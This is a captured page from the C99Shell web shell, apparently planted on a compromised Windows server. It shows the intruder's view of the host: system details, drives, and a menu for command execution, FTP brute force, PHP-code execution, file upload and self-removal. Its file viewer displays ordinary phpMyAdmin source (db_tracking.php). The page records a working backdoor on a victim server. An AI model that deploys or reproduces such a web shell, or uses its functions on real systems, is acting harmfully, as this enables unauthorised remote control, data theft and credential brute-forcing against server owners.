!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\phpMyAdmin\   drwxrwxrwx
Free 1.23 GB of 239.26 GB (0.51%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     db_tracking.php (8.08 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Tracking configuration for database
 *
 * @package PhpMyAdmin
 */

/**
 * Run common work
 */
require_once 'libraries/common.inc.php';

//Get some js files needed for Ajax requests
$response PMA_Response::getInstance();
$header   $response->getHeader();
$scripts  $header->getScripts();
$scripts->addFile('db_structure.js');

/**
 * If we are not in an Ajax request, then do the common work and show the links etc.
 */
require 'libraries/db_common.inc.php';
$url_query .= '&amp;goto=tbl_tracking.php&amp;back=db_tracking.php';

// Get the database structure
$sub_part '_structure';
require 
'libraries/db_info.inc.php';

// Work to do?
//  (here, do not use $_REQUEST['db] as it can be crafted)
if (isset($_REQUEST['delete_tracking']) && isset($_REQUEST['table'])) {
    
PMA_Tracker::deleteTracking($GLOBALS['db'], $_REQUEST['table']);

    
/**
     * If in an Ajax request, generate the success message and use
     * {@link PMA_Response()} to send the output
     */
    
if ($GLOBALS['is_ajax_request'] == true) {
        
$response PMA_Response::getInstance();
        
$response->addJSON('message'PMA_Message::success());
        exit;
    }
}

// Get tracked data about the database
$data PMA_Tracker::getTrackedData($_REQUEST['db'], '''1');

// No tables present and no log exist
if ($num_tables == && count($data['ddlog']) == 0) {
    echo 
'<p>' __('No tables found in database.') . '</p>' "\n";

    if (empty(
$db_is_system_schema)) {
        include 
'libraries/display_create_table.lib.php';
    }
    exit;
}

// ---------------------------------------------------------------------------

// Prepare statement to get HEAD version
$all_tables_query ' SELECT table_name, MAX(version) as version FROM ' .
     
PMA_Util::backquote($GLOBALS['cfg']['Server']['pmadb']) . '.' .
     
PMA_Util::backquote($GLOBALS['cfg']['Server']['tracking']) .
     
' WHERE db_name = \'' PMA_Util::sqlAddSlashes($_REQUEST['db']) . '\' ' .
     
' GROUP BY table_name' .
     
' ORDER BY table_name ASC';

$all_tables_result PMA_queryAsControlUser($all_tables_query);

// If a HEAD version exists
if ($GLOBALS['dbi']->numRows($all_tables_result) > 0) {
    
?>
    <div id="tracked_tables">
    <h3><?php echo __('Tracked tables');?></h3>

    <table id="versions" class="data">
    <thead>
    <tr>
        <th><?php echo __('Database');?></th>
        <th><?php echo __('Table');?></th>
        <th><?php echo __('Last version');?></th>
        <th><?php echo __('Created');?></th>
        <th><?php echo __('Updated');?></th>
        <th><?php echo __('Status');?></th>
        <th><?php echo __('Action');?></th>
        <th><?php echo __('Show');?></th>
    </tr>
    </thead>
    <tbody>
    <?php

    
// Print out information about versions

    
$drop_image_or_text '';
    if (
PMA_Util::showIcons('ActionLinksMode')) {
        
$drop_image_or_text .= PMA_Util::getImage(
            
'b_drop.png',
            
__('Delete tracking data for this table')
        );
    }
    if (
PMA_Util::showText('ActionLinksMode')) {
        
$drop_image_or_text .= __('Drop');
    }

    
$style 'odd';
    while (
$one_result $GLOBALS['dbi']->fetchArray($all_tables_result)) {
        list(
$table_name$version_number) = $one_result;
        
$table_query ' SELECT * FROM ' .
             
PMA_Util::backquote($GLOBALS['cfg']['Server']['pmadb']) . '.' .
             
PMA_Util::backquote($GLOBALS['cfg']['Server']['tracking']) .
             
' WHERE `db_name` = \'' PMA_Util::sqlAddSlashes($_REQUEST['db'])
             . 
'\' AND `table_name`  = \'' PMA_Util::sqlAddSlashes($table_name)
             . 
'\' AND `version` = \'' $version_number '\'';

        
$table_result PMA_queryAsControlUser($table_query);
        
$version_data $GLOBALS['dbi']->fetchArray($table_result);

        if (
$version_data['tracking_active'] == 1) {
            
$version_status __('active');
        } else {
            
$version_status __('not active');
        }
        
$tmp_link 'tbl_tracking.php?' $url_query '&amp;table='
            
htmlspecialchars($version_data['table_name']);
        
$delete_link 'db_tracking.php?' $url_query '&amp;table='
            
htmlspecialchars($version_data['table_name'])
            . 
'&amp;delete_tracking=true&amp';
        
?>
        <tr class="noclick <?php echo $style;?>">
            <td><?php echo htmlspecialchars($version_data['db_name']);?></td>
            <td><?php echo htmlspecialchars($version_data['table_name']);?></td>
            <td><?php echo $version_data['version'];?></td>
            <td><?php echo $version_data['date_created'];?></td>
            <td><?php echo $version_data['date_updated'];?></td>
            <td><?php echo $version_status;?></td>
            <td>
            <a class="drop_tracking_anchor ajax" href="<?php echo $delete_link;?>" >
            <?php echo $drop_image_or_text?></a>
        <?php
        
echo '</td>'
            
'<td>'
            
'<a href="' $tmp_link '">' __('Versions') . '</a>'
            
'&nbsp;|&nbsp;'
            
'<a href="' $tmp_link '&amp;report=true&amp;version='
            
$version_data['version'] . '">' __('Tracking report') . '</a>'
            
'&nbsp;|&nbsp;'
            
'<a href="' $tmp_link '&amp;snapshot=true&amp;version='
            
$version_data['version'] . '">' __('Structure snapshot')
            . 
'</a>'
            
'</td>'
            
'</tr>';
        if (
$style == 'even') {
            
$style 'odd';
        } else {
            
$style 'even';
        }
    }
    unset(
$tmp_link);
    
?>
    </tbody>
    </table>
    </div>
    <?php
}

$sep $GLOBALS['cfg']['NavigationTreeTableSeparator'];

// Get list of tables
$table_list PMA_Util::getTableList($GLOBALS['db']);

// For each table try to get the tracking version
foreach ($table_list as $key => $value) {
    
// If $value is a table group.
    
if (array_key_exists(('is' $sep 'group'), $value)
        && 
$value['is' $sep 'group']
    ) {
        foreach (
$value as $temp_table) {
            
// If $temp_table is a table with the value for 'Name' is set,
            // rather than a propery of the table group.
            
if (is_array($temp_table)
                && 
array_key_exists('Name'$temp_table)
            ) {
                
$tracking_version PMA_Tracker::getVersion(
                    
$GLOBALS['db'],
                    
$temp_table['Name']
                );
                if (
$tracking_version == -1) {
                    
$my_tables[] = $temp_table['Name'];
                }
            }
        }
    } else { 
// If $value is a table.
        
if (PMA_Tracker::getVersion($GLOBALS['db'], $value['Name']) == -1) {
            
$my_tables[] = $value['Name'];
        }
    }
}

// If untracked tables exist
if (isset($my_tables)) {
    
?>
    <h3><?php echo __('Untracked tables');?></h3>

    <table id="noversions" class="data">
    <thead>
    <tr>
        <th style="width: 300px"><?php echo __('Table');?></th>
        <th></th>
    </tr>
    </thead>
    <tbody>
    <?php
    
// Print out list of untracked tables

    
$style 'odd';

    foreach (
$my_tables as $key => $tablename) {
        if (
PMA_Tracker::getVersion($GLOBALS['db'], $tablename) == -1) {
            
$my_link '<a href="tbl_tracking.php?' $url_query
                
'&amp;table=' htmlspecialchars($tablename) . '">';
            
$my_link .= PMA_Util::getIcon('eye.png'__('Track table'));
            
$my_link .= '</a>';
            
?>
            <tr class="noclick <?php echo $style;?>">
            <td><?php echo htmlspecialchars($tablename);?></td>
            <td><?php echo $my_link;?></td>
            </tr>
            <?php
            
if ($style == 'even') {
                
$style 'odd';
            } else {
                
$style 'even';
            }
        }
    }
    
?>
    </tbody>
    </table>
    <?php
}
// If available print out database log
if (count($data['ddlog']) > 0) {
    
$log '';
    foreach (
$data['ddlog'] as $entry) {
        
$log .= '# ' $entry['date'] . ' ' $entry['username'] . "\n"
            
$entry['statement'] . "\n";
    }
    echo 
PMA_Util::getMessage(__('Database Log'), $log);
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0936 ]--